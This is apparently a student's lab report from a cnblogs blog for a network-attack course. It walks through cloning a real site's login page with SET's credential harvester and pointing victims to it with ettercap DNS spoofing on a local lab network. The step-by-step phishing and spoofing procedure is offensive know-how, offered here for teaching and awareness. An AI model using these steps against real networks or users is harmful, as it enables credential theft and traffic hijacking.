标签:高防 密码 邮件 被占用 cto 使用外部 eth0 遇到 端口
本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。
具体实践有
(1)简单应用SET工具建立冒名网站
(2)ettercap DNS spoof
(3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站
(4)请勿使用外部网站做实验
实验都在root权限下进行
实验需用到80端口
在kali中的root权限下输入 netstat -tupln | grep 80 命令查看80端口是否被占用
如果有,使用 kill+进程ID 杀死该进程
输入 vi /etc/apache2/ports.conf 命令修改Apache的端口文件,将端口改为80
输入 apachectl start 启动Apache服务
输入setoolkit 打开SET工具
y同意
输入1,选择1)Social-Engineering Attacks(社会工程学攻击)
输入2,选择2)Website Attack Vectors(钓鱼网站攻击向量 )
输入3,选择3)Credential Harvester Attack Method(登录密码截取攻击)
输入2,选择2)Site Cloner(进行克隆网站)
输入攻击机(kali)IP:192.168.124.129
输入要伪装的网址https://www.mosoteach.cn/web/index.php?c=passport
y确定
在靶机输入攻击机的IP:192.168.124.129
输入用户名密码,登录
这,,,就没了???有点假。。。
回到kali
第一次登陆后没找到页面,所以有了第二次。。。
输入 ifconfig eth0 promisc 将网卡改为混杂模式
输入 vi /etc/ettercap/etter.dns修改DNS缓存表
添加 www.mosoteach.cn A 192.168.124.129
esc后:wq,保存并退出
输入 ettercap -G 开启ettercap
选择网卡eth0,点击√开始监听
点击Scan for hosts开始扫描,然后点击Hosts list查看扫描结果
靶机看到192.168.124.135为靶机IP
将网关地址192.168.124.1 Add to Target 1,靶机地址192.168.124.135Add to Target 2
点击省略框-->Plugins-->Manage the plugins
双击选择dns_spoof
靶机 ping www.mosoteach.cn ,kali端观测结果
成功
按照2.1的步骤,将kali的ip192.168.124.129与博客园的首页www.cnblogs.com关联
靶机打开成功
Kali显示
打开ettercap,再用XP虚拟机再登一下
成功
(1)通常在什么场景下容易受到DNS spoof攻击
在同一局域网中
(2)在日常生活工作中如何防范以上两攻击方法
2.2时看过他们的博客网关IP结尾都是.1,就以为自己的也是.1,做了n多遍没有成功,直到我放了一会
它请求了一下,,,我才发现我的网关IP是.2.。。。
果然做实验要有自己的思维与思考
本次试验难度没有那么大,但也需要仔细一些,总得来说本次试验对于我们的教育意义比较大,通过对于一些技术手段的应用以及我们所看到的结果,让我们了解了很多关于网络欺诈的知识,让我们更加警惕公共网络带给我们的危害,提高了我们的安全意识。
20174304王天政《网络对抗技术》Exp7 网络欺诈防范
标签:高防 密码 邮件 被占用 cto 使用外部 eth0 遇到 端口
原文地址:https://www.cnblogs.com/wtz0409/p/12861316.html